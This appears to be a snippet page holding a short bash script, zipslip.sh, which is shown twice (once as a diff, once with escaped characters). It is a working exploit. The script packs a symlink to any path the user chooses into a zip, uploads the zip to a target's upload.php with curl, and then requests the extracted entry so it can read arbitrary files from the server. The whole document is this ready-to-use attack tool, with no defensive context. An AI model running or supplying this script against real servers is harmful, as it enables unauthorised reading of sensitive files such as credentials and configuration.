paraddise · December 24, 2023 20:20
diff --git a/zipslip.sh b/zipslip.sh
 #!/usr/bin/env bash
 #set -x
 # Usage: zipslip <host_to_send_and_read> <zip_file_name> <entry_name> <symlink_path>
 # This scripts is just a sample, edit to fit your needs

 host=$1
 file_name=$2
 entry_name=$3
 spath=$4

 tmp_dir=`mktemp -d` # create temp directory
 cd $tmp_dir || exit 1
  ln -fs "$spath" $entry_name
  zip -q --symlinks $file_name $entry_name
 cd - >/dev/null|| exit 1

 ## Sending
 curl -q $host/upload.php \
  -F "zipFile=@$tmp_dir/$file_name" \
  -F "submit=" \
  --insecure > /dev/null
 ## Reading
 curl -X GET "$host/uploads/$(md5 -q "$tmp_dir/$file_name")/$entry_name"
 rm -rf "$tmp_dir"
	#!/usr/bin/env bash
	#set -x
	# Usage: zipslip <host_to_send_and_read> <zip_file_name> <entry_name> <symlink_path>
	# This scripts is just a sample, edit to fit your needs

	host=$1
	file_name=$2
	entry_name=$3
	spath=$4

	tmp_dir=`mktemp -d` # create temp directory
	cd $tmp_dir \|\| exit 1
	ln -fs "$spath" $entry_name
	zip -q --symlinks $file_name $entry_name
	cd - >/dev/null\|\| exit 1

	## Sending
	curl -q $host/upload.php \
	-F "zipFile=@$tmp_dir/$file_name" \
	-F "submit=" \
	--insecure > /dev/null
	## Reading
	curl -X GET "$host/uploads/$(md5 -q "$tmp_dir/$file_name")/$entry_name"
	rm -rf "$tmp_dir"